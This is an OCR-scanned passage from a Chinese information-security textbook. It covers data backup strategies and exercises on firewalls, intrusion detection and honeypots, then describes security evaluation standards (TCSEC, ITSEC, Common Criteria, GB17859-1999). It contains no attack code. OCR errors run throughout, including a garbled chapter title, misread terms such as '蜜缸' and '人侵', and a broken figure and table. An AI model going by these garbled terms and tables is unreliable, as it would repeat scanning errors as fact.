自然 灾害 、 系 统 故障 等 都 有 可 能 造成 数据 丢失 。 其 中 ,50% 以 上 的 数据 丢失 来 自 系统 的 软件 
或 硬件 故障 ,30% 以 上 的 数据 丢失 来 自 误 操 作 ,15% 的 数据 丢失 来 自 病毒 和 自然 灾害 。 从 总 
的 情况 来 看 ,要 想 对 数据 的 存储 进行 安全 保护 ,最 有 效 的 措施 是 进行 数据 备份 。 


1. 数据 备份 的 策略 


数据 备份 策略 包括 备份 时 间 、 备 份 数据 种 类 和 故障 恢复 等 方式 。 下 面 介绍 4 种 备份 
策略 。 

(1) 完全 备份 

完全 备份 (full backup) 是 指 将 整个 系统 或 用 户 指 定 的 所 有 文件 数据 全 都 进行 一 次 备 
份 。 这 种 策略 简单 ,操作 起 来 比较 方便 ,但 是 每 次 备份 的 工作 量 很 大 ,需要 大 容量 的 备份 介 
质 , 时 间 代 价 也 比较 高 ,并 且 在 数据 备份 期 间或 备份 间隔 有 了 数据 变更 后 又 出 现 了 数据 丢失 
时 ,只 能 使 用 上 次 备份 的 数据 ,更 新 的 数据 就 被 丢失 。 

(2) 增 量 备份 
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增 量 备份 (incremental backup) 只 备份 上 次 备份 后 做 过 更 新 的 文件 。 这 种 系统 的 性 能 
和 容量 可 以 很 好 地 改善 。 但 是 ,一 旦 出 现 数据 故障 时 就 要 进行 数据 恢复 ,不 得 不 从 最 后 一 次 
的 备份 向 前 进行 链 式 恢 复 。 若 其 中 任何 一 个 中 间 环 节 出 现 问题 ,都 使 恢复 难于 继续 。 因 此 ， 
这 种 模式 与 全 盘 备 份 配合 使 用 效果 较 好 。 

(3) 差别 备份 

差别 备份 (differential backup) 是 只 对 上 次 全 盘 备 份 之 后 更 新 过 的 所 有 文件 。 这 样 , 全 
部 系统 只 需要 两 组 磁带 (最 后 一 次 全 盘 备 份 磁带 和 最 后 一 次 差别 备份 磁带 ) 就 可 以 恢复 。 

(4) 按 需 备份 

按 需 备份 是 指 在 正常 的 备份 之 外 ,有 选择 地 进行 的 额外 备份 操作 。 按 需 分 配 可 以 弥补 
元 余 管 理 或 长 期 转 储 的 日 常备 份 的 不 足 。 


2. 数据 备份 模式 


从 备份 模式 看 ,数据 备份 可 以 分 为 逻辑 备份 和 物理 备份 。 

(1) 逻辑 备份 

逻辑 备份 也 称 “ 基 于 文件 (file-based) 备 份 ”, 即 以 文件 为 单位 进行 复制 备份 。 这 种 备份 
使 得 每 个 单独 的 文件 恢复 比较 简单 。 但 是 ,一 个 文件 往往 可 能 是 由 分 散在 磁盘 上 的 多 个 数 
据 块 链接 而 成 ;文件 备份 需要 进行 文件 操作 ,又 需要 对 数据 块 进行 操作 。 这 样 ,对 非 连 续 存 
储 在 磁盘 上 的 文件 进行 备份 时 ,需要 额外 的 查找 操作 。 这 些 额外 的 查找 操作 会 增加 磁盘 开 
销 。 此 外 ,即使 文件 中 有 很 小 的 改变 ,也 要 对 整个 文件 进行 一 次 备份 。 

(2) 物理 备份 

物理 备份 也 称 * 基 于 块 (block-based) 备 份 ? 或 “基于 设备 (device-based) 的 备份 ”。 这 种 
备份 以 物理 数据 块 为 单位 ,而 不 是 按 表 、 索 引 等 逻辑 块 为 单位 进行 备份 ,因此 花费 在 搜索 上 
的 开销 很 少 ,备份 效率 高 。 但 是 在 恢复 时 必须 收集 文件 和 目录 的 信息 ,要 知道 具体 的 数据 块 
是 以 什么 方式 组 织 到 文件 中 的 ,因此 恢复 的 效率 很 低 。 


3. 数据 备份 环境 


按照 备份 环境 ,备份 可 以 是 冷 备份 ,也 可 以 是 热 备份 。 

(1) 冷 备份 

冷 备份 也 叫 离线 备份 ,是 指 在 执行 备份 操作 时 ,服务 器 不 接受 来 自用 户 和 应 用 对 数据 的 
修改 。 这 样 ,可 以 很 好 地 解决 备份 选择 进行 时 并 发 数据 更 新 所 带 来 的 数据 不 一 致 ,缺点 是 用 
户 需 要 等 待 较 长 的 时 间 。 

(2) 热 备份 

热 备份 也 叫 在 线 备份 、 数 据 复制 .同步 数据 备份 , 即 在 数据 更 新 时 也 允许 数据 备份 。 这 种 
备份 用 户 不 需 等 待 ,但 要 采用 文件 的 单独 写 / 修 改 特权 等 技术 措施 解决 数据 的 不 一 致 问题 。 


习 题 
1. 在 组 建 Intranet 时 ,防火 墙 是 必需 的 吗 ? 为什么? 


2. 试 述 一 个 防火 墙 产品 应 具备 哪些 基本 功能 ? 
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3. 下 面 是 选择 防火 墙 时 应 考虑 的 一 些 因素 ,请 按 你 的 理解 ,将 它们 按 重要 性 排序 。 

。 被 保护 网 络 受 威胁 的 程度 ; 

。 受 到 入 侵 , 网 络 的 损失 程度 ; 

。 网 络 管理 员 的 经 验 ; 

。 被 保护 网 络 已 有 的 安全 措施 ; 

。 网 络 需求 的 发 展 ; 

。 防火墙 自身 管理 的 难 易 度 ; 

。 防火 墙 自身 的 安全 性 。 

4. 列举 更 多 的 防火 墙 系统 结构 。 最 好 有 自己 的 创意 。 

5. 查找 资料 ,叙述 防火 墙 测试 的 内 容 和 方法 。 

6. 查找 资料 ,叙述 防火 墙 选 型 的 基本 原则 和 具体 标准 。 

7. 简 述 攻击 防火 墙 的 主要 手段 。 

8. 查找 资料 , 简 述 目前 国内 外 防火 墙 技术 发 展 的 现状 和 自己 对 防火 墙 的 未 来 有 何 设想 ? 

9. 收集 资料 ,对 当前 常用 的 防火 墙 产 品 进行 分 析 比 较 。 详 细 描述 其 中 的 3 种 防火 墙 产 
品 的 用 法 以 及 升级 方法 。 

10. 浏览 最 热门 的 3 个 防火 墙 技术 网 站 ,综述 目前 关于 防火 墙 讨论 的 热点 问题 。 

11. 简 述 安全 审计 的 作用 。 

12. 简 述 日 志 的 作用 和 记录 内 容 。 

13. 综述 入 侵 检测 技术 的 发 展 过 程 , 并 提出 自己 的 思路 。 

14. 综述 有 关 入 侵 检测 技术 的 各 种 定义 。 

15. 人 和 人 侵 检测 系统 有 哪些 可 以 利用 的 数据 源 ? 

16. 试 构造 一 个 网 络 数据 包 的 截获 程序 。 

17. 试 述 入 侵 检 测 系统 的 工作 原理 。 

18. 收集 资料 ,对 国内 外 主要 基于 网 络 的 入 侵 检测 产品 进行 比较 。 

19. 收集 资料 ,对 国内 外 主要 基于 主机 的 入 侵 检测 产品 进行 比较 。 

20. 分 析 入 侵 检测 系统 的 不 足 和 发 展 趋势 。 

21. 审计 与 人 侵 检 测 有 什么 关联 ? 

22. 入 侵 检测 技术 与 法 律 有 什么 关系 ? 

23. 收集 国内 外 有 关 入 侵 检测 .网络 诱 骗 或 安全 审计 的 网 站 信息 ,简要 说 明 各 网 站 的 特点 。 

24. 收集 国内 外 有 关 入 侵 检测 .网 络 诱骗 或 安全 审计 的 最 新 动态 。 

25. 简 述 蜜 缸 技术 的 特殊 用 途 。 

26. 用 下 载 的 蜜 饶 工 具 , 构 造 一 个 简单 的 蜜 锥 系统 。 

27. 灾难 恢复 涉及 哪些 内 容 和 哪些 技术 ? 

28. 简 述 数据 容错 和 数据 容 灾 之 间 的 联系 与 区 别 。 

29. 简 述 数据 备份 在 数据 容错 和 数据 容 灾 中 的 作用 。 

30. 简 述 各 种 数据 备份 技术 的 特点 , 简 述 各 种 数据 备份 策略 的 用 途 。 

31. 收集 国内 外 有 关 数 据 容 错 网 站 的 信息 ,简要 说 明 各 网 站 的 特点 。 

32. 收集 国内 外 有 关 数 据 容 错 技术 的 最 新 动态 。 
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党 6 章 恒 已 系统 安全 管 型 


有 人 说 ,管理 就 是 要 人 蔡 你 把 事情 做 好 。 管 理 是 控制 ,管理 是 协调 ,管理 的 目标 是 优化 。 
在 工作 头绪 很 多 的 信息 系统 安全 领域 ,缺少 管理 或 者 管理 不 到 位 ,技术 即使 有 优势 也 难于 发 
挥 。 所 以 ,信息 系统 的 安全 要 从 管理 .技术 .运行 3 个 方面 去 考虑 。 

信息 系统 安全 管理 涉及 诸多 方面 ,例如 系统 安全 综合 管理 .安全 风险 管理 .安全 服务 管 
理 , 安 全 机 制 管理 ,安全 事件 管理 ,安全 审计 管理 ,安全 恢复 管理 ,保密 设备 和 密 钥 管 理 、 安 全 
行政 管理 .人事 管理 .软件 安全 管理 ,应 用 系统 安全 管理 .运行 管理 ,操作 安全 管理 ,以 及 技术 
文档 管理 等 。 

本 章 不 可 能 逐一 介绍 这 些 内 容 , 仅 就 其 中 一 些 关 键 内 容 进 行 重点 介绍 。 


6.1 信息 系统 安全 测评 认证 


全 需求 与 安全 代价 总 是 安全 问题 上 相互 对 立 的 统一 体 。 对 信息 技术 信息 系统 和 信 
息 产品 的 安全 等 级 进行 评价 ,将 会 使 生产 者 和 用 户 在 这 两 个 方面 容易 找到 一 个 科学 的 折 中 。 
因此 ,建立 完善 的 信息 技术 安全 的 测评 标准 与 认证 体系 ,规范 信息 技术 产品 和 系统 的 安全 特 
性 ,是 实现 信息 安全 保障 的 一 种 有 效 措施 。 它 有 助 于 建立 起 科学 的 安全 产品 生产 体系 和 服 
务 体系 ,也 是 进行 信息 系统 安全 管理 的 参照 和 依据 。 


6.1.1 国际 信息 安全 评价 标准 


第 一 个 有 关 信 息 技术 安全 的 标准 是 美国 国防 部 于 1985 年 提出 的 可 信 计 算 机 系统 评价 
准则 TCSEC ,又 称 橘 皮 书 。 以 后 ,许多 国家 和 国际 组 织 也 相继 提出 了 新 的 安全 评价 准则 。 
图 6. 1 所 示 为 国际 主要 信息 技术 安全 测评 标准 的 发 展 及 其 联系 。 


加 拿 大 可 信 计算 机 
(各 产品 评价 准则 
CTCPEC(1989 年 ) 
| | 


美国 国防 部 ”|_| 美国 国防 部 可 信 |_N 欧洲 信息 技术 。 |_| 国际 通用 准则 |_N CC 成 为 国际 标准 
DoD5200.28-M 计算 机 评价 准则 安全 性 评价 准则 CC ISO 15408 
(1979 年 6 月 ) | Yi TCSEC(1985 年 ) | YI ITSEC(1991 年 ) | 1) (1996 年 ) ” 门 ) (1999 年 ) 
| bb 证 
中 国信 息 保护 准则 美国 联 郊 准则 
GB17859-1999 de 


图 6.1 国际 主要 信息 技术 安全 测评 标准 的 发 展 及 其 联系 
在 信息 安全 等 级 标准 中 ,一 个 非常 重要 的 概念 是 可 信 计 算 基 (trusted computing base， 
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TCB)。TCB 是 计算 机 系统 内 保护 装置 的 总 体 , 包 括 硬 件 、 固 件 和 软件 。 它 们 根据 安全 策略 
来 处 理 主体 (系统 管理 员 .安全 管理 员 用户 、 进 程 ) 对 客体 (进程 .文件 .记录 、 设 备 等 ) 的 访 
问 。TCB 还 具有 抗 自 改 的 性 能 和 易于 分 析 与 测试 的 结构 。 


1. DoDs200. 28-M 


世界 上 最 早 的 计算 机 系统 安全 标准 应 当 是 美国 国防 部 1979 年 6 月 25 日 发 布 的 军 标 
DoD5200. 28-M。 它 为 计算 机 系统 定义 了 4 种 不 同 的 运行 模式 。 

(1) 受 控 的 安全 模式 : 系统 用 户 对 系统 的 机 密 材料 的 访问 控制 不 在 操作 系统 中 实现 ， 
安全 的 实现 可 以 通过 控制 用 户 对 机 器 的 操作 权 等 管理 措施 实现 。 

(2) 自主 安全 模式 : 计算 机 系统 和 外 围 设备 可 以 在 指定 用 户 或 用 户 群 的 控制 下 工作 ， 
该 类 用 户 了 解 并 可 自主 地 设置 机 密 材 料 的 类 型 与 安全 级 别 。 

(3) 多 级 安全 模式 : 系统 允许 不 同 级 别 和 类 型 的 机 密 资 料 并 存 和 并 发 处 理 , 并 且 有 选 
择 地 许可 不 同 的 用 户 对 存储 数据 进行 访问 。 用 户 与 数据 的 隔离 控制 由 操作 系统 和 相关 系统 
软件 实现 。 

(4) 强 安全 模式 : 所 有 系统 部 件 依 照 最 高 级 别 类 型 得 到 保护 ,所 有 系统 用 户 必须 有 一 
个 安全 策略 。 系 统 的 控制 操作 对 用 户 透明 ,由 系统 实现 对 机 密 材料 的 并 发 控制 。 


2. TCSEC 


TCSEC 是 计算 机 系统 安全 评价 的 第 一 个 正式 标准 ,于 1970 年 由 美国 国防 科学 技术 委 
员 会 提出 ,于 1985 年 12 月 由 美国 国防 部 公 

TCSEC 把 计算 机 系统 的 安全 分 为 4 等 7 级 : 

(1) D 等 ( 含 1 级 ) 

D1 级 系统 : 最 低级 。 只 为 文件 和 用 户 提供 安全 保护 。 

(2) C 等 ( 含 2 级 ) 

C1 级 系统 : 可 信 计 算 基 TCB 通过 用 户 和 数据 分 开 达 到 安全 目的 ,使 所 有 的 用 户 都 以 
同样 的 灵敏 度 处 理 数 据 (可 认为 所 有 文档 有 相同 机 密 性 ) 。 

C2 级 系统 : 在 C1 级 基础 上 ,通过 登录 .安全 事件 和 资源 隔离 增强 可 调 的 审慎 控制 。 在 
连接 到 网 上 时 ,用 户 分 别 对 自己 的 行为 负责 。 

(3) B 等 ( 含 3 级 ) 

B 级 具有 强制 性 保护 功能 。 强 制 性 意味 着 在 没有 与 安全 等 级 相连 的 情况 下 ,系统 就 不 
会 让 用 户 存 取 对 象 。 

Q@ Bl 级 系统 : 

。 对 每 个 对 象 都 进行 灵敏 度 标 记 , 导 入 非 标 记 对 象 前 要 先 标 记 它 们 ; 

。 用 灵敏 度 标记 作为 强制 访问 控制 的 基础 ; 

。 灵敏 度 标 记 必须 准确 地 表示 其 所 联系 的 对 象 的 安全 级 别 ; 

。 系统 必须 使 用 用 户口 令 或 身份 认证 来 决定 用 户 的 安全 访问 级 别 ; 

。 系统 必须 通过 审计 来 记录 未 授权 访问 的 企图 。 

@ B2 级 系统 : 

。 必须 符合 Bl 级 系统 的 所 有 要 求 ; 
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系统 管理 员 必 须 使 用 一 个 明确 的 ,文档 化 的 安全 策略 模式 作为 系统 可 信任 运算 基础 
体制 ,可 信任 运算 基础 体制 能 够 支持 独立 的 操作 者 和 管理 员 ; 

。 只 有 用 户 能 够 在 可 信任 通信 路 径 中 进行 初始 化 通信 ; 

。 所 有 与 用 户 相关 的 网 络 连接 的 改变 必须 通知 所 有 的 用 户 。 

@ B3 级 系统 具有 很 强 的 监视 委托 管理 访问 能 力 和 抗 干 扰 能 力 。 要 求 : 

。 必须 符合 B2 系统 所 有 安全 需求 ; 

。 必须 设 有 安全 管理 员 ; 

。 除 控制 个 别 对 象 的 访问 外 ,必须 产生 一 个 可 读 的 安全 列表 ,每 个 被 命名 的 对 象 提供 

对 该 对 象 没 有 访问 的 用 户 列表 说 明 ; 

。 系统 验证 每 一 个 用 户 身份 ,并 发 送 一 个 取消 访问 的 审计 跟踪 消息 ; 

。 设 计 者 必须 正确 区 分 可 信任 路 径 和 其 他 路 径 ; 

。 可 信任 的 通信 基础 体制 为 每 一 个 被 命名 的 对 象 建立 安全 审计 跟踪 ; 

。 可 信任 的 运算 基础 体制 支持 独立 的 安全 管理 。 

(4) A 等 (只 含 1 级) 一 一 最 高 安全 级 别 

Al 级 与 B3 级 相似 ,对 系统 的 结构 和 策略 不 作 特 别 要 求 ,而 系统 的 设计 者 必须 按照 一 
个 正式 的 设计 规范 进行 系统 分 析 , 分 析 后 必须 用 核对 技术 确保 系统 符合 设计 规范 。Al 系 
统 必须 满足 : 

。 系统 管理 员 必 须 接收 到 开发 者 提供 的 安全 策略 正式 模型 ; 

。 所 有 的 安装 操作 都 必须 由 系统 管理 员 进 行 ; 

。 系统 管理 员 进 行 的 每 一 步 安装 操作 必须 有 正式 的 文档 。 

TCSEC 的 初衷 主 要 是 针对 集中 式 计 算 的 分 时 多 用 户 操作 系统 。 后 来 又 针对 网 络 ( 分 布 
式 ) 和 数据 库 管理 系统 (C/S 结构 ) 补 充 了 一 些 附加 说 明和 解释 ,典型 的 有 可 信 计 算 机 网 络 系 
统 说 明 CNCSC-TG-005) 和 可 信 数 据 库 管 理 系 统 解 释 等 。 


3. 欧 共 体 信 息 技术 安全 评价 准则 ITSEC 


ITSEC 是 欧 共 体 于 1991 年 发 布 的 , 它 是 欧洲 多 国安 全 评价 方法 的 综合 产物 ,应 用 领域 
是 军队 、 政 府 和 商业 。 该 标准 将 安全 的 概念 分 为 功能 和 评估 两 部 分 。 

(1) 功能 准则 

分 为 10 级 : F1 一 Fl10。 

。F1 一 F5 对 应 TCSEC 的 D~A; 

。F6 一 Fl10 对 应 数据 和 程序 的 完整 性 .系统 的 可 用 性 、 数 据 通信 的 完整 性 和 保密 性 。 

(2) 评估 准则 

评估 准则 分 为 6 级, 分别 是 测试 .配置 控制 和 可 控 的 分 配 .详细 设计 和 编码 .详细 的 脆弱 
性 分 析 , 设 计 与 源 代码 明显 对 应 ,以 及 设计 与 源 代码 在 形式 上 的 一 致 。 


4. 加 拿 大 可 信 计 算 机 产品 安全 评价 准则 CTCPEC 


CTCPEC 是 加 拿 大 于 1992 年 发 布 的 。 它 综合 了 TCSEC 和 ITSEC 两 个 准则 的 优点 ， 
针对 政府 需求 设计 。 它 将 安全 分 为 功能 性 需求 和 保证 性 需求 两 部 分 。 功 能 性 需求 分 为 4 大 
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类 : 机 密 性 ;可 用 性 ;完整 性 ;可 控 性 。 
每 一 种 安全 需求 又 分 为 一 些小 类 (分 级 条 数 为 0 一 5) ,以 表示 安全 性 上 的 差别 。 


5. 美国 信息 技术 安全 评价 联邦 准则 FC 


FC 也 是 吸收 了 TCSEC 和 ITSEC 两 个 准则 的 优点 ,于 1992 年 发 布 的 。 它 引入 了 “ 保 
护 轮 廓 (PP)” 的 概念 。 每 个 轮廓 都 包括 功能 、 开 发 保证 和 评价 三 部 分 ,在 美国 政府 、 民 间 和 
商业 上 应 用 很 广 。 


6. 国际 通用 准则 CC 


1993 年 6 月 , 欧 、 美 .加 等 有 关 6 国 将 各 自 独立 的 准则 集合 成 一 系列 单一 的 ,能 被 广泛 
接受 的 IT 安全 准则 一 一 通用 准则 CC, 将 CC 提交 给 ISO ,并 于 1996 年 颁布 了 1.0 版 。1999 
年 12 月 ISO 正式 将 CC 2.0(1998 年 颁布 ) 作 为 国际 标准 一 一 ISO 15408 发 布 。 

CC 的 主要 思想 和 框架 都 取 自 ITSEC 和 FC, 并 突出 了 “保护 轮廓 ”的 概念 。 它 将 评估 过 
程 分 为 安全 保证 和 安全 功能 两 部 分 。 安 全 保证 要 求 为 7 个 评估 保证 级 别 : 

。 EAL1l: 功能 测试 。 

。 EAL2: 结构 测试 。 

。 EAL3: 系统 测试 和 检查 。 

。 EAL4: 系统 设计 .测试 和 复查 。 

。 EAL5: 半 形 式 化 设计 和 测试 。 

。 EAL6: 半 形 式 化 验证 的 设计 和 测试 。 

。 EAL7: 集成 化 验证 的 设计 和 测试 。 

表 6. 1 为 CC、TCSEC ITSEC 标准 之 间 的 对 应 关系 。 


表 6.1 CC TCSEC ITSEC 标准 之 间 的 对 应 关系 


ms D er EAL4 Bl E4 
EAL1 = El EAL5 B2 E5 
EAL2 Cl E2 EAL6 B3 E6 
EAL3 C2 E3 EAL7 A La 


CC 目前 已 经 发 布 了 如 下 版 本 : 

。 1996 年 6 月 发 布 CC 第 1 版 ; 

。 1998 年 5 月 发 布 CC 第 2 版 ; 

。 1999 年 10 月 发 布 CC 第 2.1 版 ,并 成 为 ISO 标准 。 


6.1.2 中 国信 息 安全 等 级 保护 准则 


中 国 已 经 发 布 实施 (计算 机 信息 系统 安全 保护 等 级 划分 准则 》GB17859-1999。 这 是 一 

部 强制 性 国家 标准 ,也 是 一 种 技术 法 规 。 它 是 在 参考 了 DoD 5200. 28-STD 和 NCSC-TC- 

005 的 基础 上 ,从 自主 访问 控制 .强制 访问 控制 .标记 、 身 份 鉴别 .客体 重用、 审计 、 数 据 完整 
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性 、 隐 藏 信道 分 析 、 可 信 路 径 和 可 恢复 10 个 方面 将 计算 机 信息 系统 安全 保护 等 级 划分 为 5 
个 级 别 的 安全 保护 能 力 。 

。 第 一 级 : 用 户 自主 保护 级 ,相当 于 TCSEC 中 定义 的 C1 级 。 

。 第 二 级 : 系统 审计 保护 级 ,相当 于 TCSEC 中 定义 的 C2 级 。 

。 第 三 级 : 安全 标记 保护 级 ,相当 于 TCSEC 中 定义 的 B1 级 。 

。 第 四 级 : 结构 化 保护 级 ,相当 于 TCSEC 中 定义 的 B2 级 。 

。 第 五 级 : 访问 验证 保护 级 ,相当 于 TCSEC 中 定义 的 B3 级 。 

计算 机 信息 系统 的 安全 保护 能 力 随 着 安全 保护 等 级 的 增高 而 增强 。 

在 信息 安全 等 级 标准 中 ,各 等 级 之 间 的 差异 在 于 TCB 的 构造 不 同 以 及 其 所 具有 的 安全 
保护 能 力 的 不 同 。 表 6. 2 为 这 5 个 级 别 之 间 的 简单 比较 。 


表 6.2 操作 系统 的 5 个 级 别 之 间 的 比较 


第 一 级 第 二 级 第 三 级 第 四 级 第 五 级 
用 户 自主 保护 级 | 系统 审计 保护 级 | 安全 标记 保护 级 | 结构 化 保护 级 | 访问 验证 保护 级 
自主 访问 控制 @ @ @ @ @ 
身份 鉴别 @ @ @ @ @ 
数据 完整 性 @ @ @ @ @ 
客体 重用 @ @ @ @ 
审计 @ © @ @ 
强制 访问 控制 @ @ @ 
标记 @ @ @ 
隐蔽 信道 分 析 @ @ 
可 信 路 径 @ @ 
可 信 恢 复 © 
下 面 介绍 各 等 级 的 基本 内 容 。 


1. 第 一 级 : 用 户 自主 保护 级 


本 级 的 可 信 计 算 基 通过 隔离 用 户 与 数据 ,使 用 户 具备 自主 安全 保护 的 能 力 。 它 具有 多 
种 形式 的 控制 能 力 , 对 用 户 实施 访问 控制 , 即 为 用 户 提供 可 行 的 手段 ,保护 用 户 和 用 户 组 信 
息 , 避 免 其 他 用 户 对 数据 的 非法 读 写 与 破坏 。 

(1) 自主 访问 控制 : 可 信 计 算 基 定义 系统 中 的 用 户 和 命名 用 户 对 命名 客体 的 访问 ,并 
允许 命名 用 户 以 自己 的 身份 或 用 户 组 的 身份 指定 并 控制 对 客体 的 访问 ,阻止 非 授 权 用 户 读 

(2) 身份 鉴别 : 从 用 户 的 角度 看 ,可 信 计 算 基 的 责任 就 是 进行 身份 鉴别 。 在 系统 初始 
化 时 ,首先 要 求 用 户 标识 自己 的 身份 ,并 使 用 保护 机 制 (例如 ,口令 ) 来 鉴别 用 户 的 身份 ,阻止 
非 授 权 用 户 访问 用 户 身份 鉴别 数据 。 

(3) 数据 完整 性 : 可 信 计 算 基 通过 自主 完整 性 策略 ,阻止 非 授 权 用 户 修 改 或 破坏 敏感 
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2. 第 二 级 : 系统 审计 保护 级 


这 一 级 除 具 备 第 一 级 所 有 的 安全 功能 外 ,要 求 创建 和 维护 访问 的 审计 跟踪 记录 使 所 有 
用 户 对 自己 的 合法 性 行为 负责 。 具 体 保 护 能 力 如 下 。 

(1) 自主 访问 控制 : 可 信 计 算 基 定义 实施 的 访问 控制 的 粒度 是 单个 用 户 。 没 有 存 取 权 
的 用 户 只 允许 由 授权 用 户 指定 对 客体 的 访问 权 。 

(2) 身份 鉴别 比 用 户 自主 保护 级 增加 两 点 : 

。 通 过 为 用 户 提供 唯一 标识 ,可 信 计 算 基 使 用 户 对 自己 的 行为 负责 。 

。 具 备 将 身份 标识 与 该 用 户 所 有 可 审计 行为 相关 联 的 能 力 。 

(3) 客体 重用 : 在 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指定 、 分 配 或 再 分 配 
一 个 主体 之 前 ,撤销 该 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释放 的 客体 的 访 
问 权时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

(4) 审计 : 在 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ,并 能 阻止 非 
授权 的 用 户 对 它 访问 或 破坏 。 

可 信 计 算 基 能 记录 下 述 事 件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 址 空间 (例如 , 打 
开 文件 ,程序 初始 化 ) ;删除 客体 ;由 操作 员 、 系 统管 理 员 或 系统 安全 管理 员 实 施 的 动作 ,以 及 
其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 事件 的 日 期 和 时 间 、 用 户 、 事 
件 类 型 .事件 是 否 成 功 。 对 于 身份 鉴别 事件 ,审计 记录 包含 请 求 的 来 源 ( 例 如 ,终端 标识 符 ) 、 
对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 、 客 体 名 。 对 不 能 由 可 信 计 算 基 独立 分 
辨 的 审计 事件 ,审计 机 制 提 供 审 计 记 录 接 口 , 可 由 授权 主体 调用 。 这 些 审 计 记 录 区 别 于 计算 
机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 记录 。 

(5) 数据 完整 性 : 可 信 计 算 基 通过 自主 完整 性 策略 ,阻止 非 授 权 用 户 修改 或 破坏 敏感 


3. 第 三 级 : 安全 标记 保护 级 


本 级 的 可 信 计 算 基 具有 系统 审计 保护 级 的 所 有 功能 。 此 外 ,还 要 以 访问 对 象 的 安全 级 
别 限制 访问 者 的 访问 权限 ,实现 对 访问 对 象 的 强制 访问 。 为 此 需要 提供 有 关 安 全 策略 模型 、 
数据 标记 ,以 及 主体 对 客体 强制 访问 控制 的 非 形 式 化 描述 ,具有 准确 地 标记 输出 信息 的 能 
力 ,以便 消除 测试 发 现 的 任何 错误 。 

(1) 自主 访问 控制 : 同系 统 审 计 保 护 级 。 

(2) 强制 访问 控制 : 可 信 计 算 基 对 所 有 主体 及 其 控制 的 客体 (例如 ,进程 .文件 . 段 、 设 
备 ) 实 施 强制 访问 控制 。 通 过 敏感 标记 为 这 些 主体 及 客体 指定 安全 等 级 。 安 全 等 级 用 二 维 
组 表示 : 第 一 维 是 等 级 分 类 (如 秘密 、 机 密 、 绝 密 等 ), 第 二 维 是 范畴 (如 适用 范畴 )。 它 们 是 
实施 强制 访问 控制 的 依据 。 可 信 计 算 基 支持 两 种 或 两 种 以 上 成 分 组 成 的 安全 级 。 可 信 计 算 
基 控 制 的 所 有 主体 对 客体 等 级 分 类 的 访问 : 

。 仅 当主 体 安全 级 中 的 等 级 分 类 高 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主体 安全 级 

中 的 非 等 级 类 别 包 含 了 客体 安全 级 中 的 全 部 非 等 级 类 别 ,主体 才能 读 客体 ; 
。 仅 当主 体 安全 级 中 的 等 级 分 类 低 于 或 等 于 客体 安全 级 中 的 等 级 分 类 ,是 主体 安全 级 
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中 的 非 等 级 类 别 包 含 了 客体 安全 级 中 的 全 部 非 等 级 类 别 ,主体 才能 写 一 个 客体 。 

可 信 计 算 基 使 用 身份 和 鉴别 数据 ,鉴别 用 户 的 身份 .并 保证 用 户 创建 的 可 信 计 算 基 外 部 
主体 的 安全 级 和 授权 受 该 用 户 的 安全 级 和 授权 的 控制 。 

(3) 敏感 标记 : 敏感 标记 是 实施 强制 访问 的 基础 。 可 信 计 算 基 应 明确 规定 需要 标记 的 
客体 (例如 ,进程 .文件 . 段 . 设 备 ) ,明确 定义 标记 的 粒度 (如 文件 级 .字段 级 等 ) ,并 必须 使 其 
主要 数据 结构 具有 相关 的 敏感 标记 。 为 了 输入 未 加 安全 标记 的 数据 ,可 信 计 算 基 向 授权 用 
户 要 求 并 接受 这 些 数据 的 安全 级 别 , 且 可 由 计算 机 信息 系统 可 信 计 算 基 审计 。 

(4) 身份 鉴别 : 可 信 计 算 基 初 始 执行 时 ,首先 要 求 用 户 标 识 自己 的 身份 ,而 且 可 信 计 算 
基 维 护 用 户 身份 识别 数据 并 确定 用 户 访问 权 及 授权 数据 。 其 他 同系 统 审计 保护 级 。 

(5) 客体 重用 : 在 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指定 、 分 配 或 再 分 配 
一 个 主体 之 前 ,撤销 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释放 的 客体 的 访问 
权时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

(6) 审计 : 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ,并 能 阻止 非 授 
权 的 用 户 对 它 访 问 或 保护 。 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ;将 客体 引入 
用 户 地址 空间 (例如 ,打开 文件 .程序 初始 化 ) ;删除 客体 ;由 操作 员 、 系 统管 理 员 或 系统 安全 
管理 员 实 施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 事件 
的 日 期 和 时 间 、 用 户 、 事 件 类 型 事件 是 否 成 功 。 对 于 身份 鉴别 的 事件 ,审计 记录 包含 请 求 的 
来 源 ( 例 如 终端 标识 符 ) 、 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 、 客 体 名 及 客体 
的 安全 级 别 。 此 外 ,可 信 计 算 基 具有 审计 更 改 可 读 输 出 记号 的 能 力 。 对 不 能 由 可 信 计 算 基 
独立 分 辨 的 审计 事件 ,审计 机 制 提供 审计 记录 接口 ,可 由 授权 主体 调用 。 这 些 审计 记录 区 别 
于 可 信 计 算 基 独立 分 辨 的 审计 记录 。 

(7) 数据 完整 性 : 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 ,阻止 非 授权 用 户 修改 或 破 
坏 敏 感 信息 。 在 网 络 环境 中 ,使 用 完整 性 敏感 标记 来 确保 信息 在 传送 中 未 受 损 。 


4. 第 四 级 : 结构 化 保护 级 


本 级 的 计算 机 信息 系统 可 信 计 算 基 建立 在 一 个 明确 定义 的 形式 化 安全 策略 模型 之 上 ， 
将 它 要求 第 三 级 系统 中 的 自主 和 强制 访问 控制 扩展 到 所 有 主体 与 客体 。 此 外 ,还 要 考虑 隐 
项 信道 。 本 级 的 可 信 计 算 基 必须 结构 化 为 关键 保护 元 素 和 非 关 键 保护 元 素 ; 可 信 计 算 基 的 
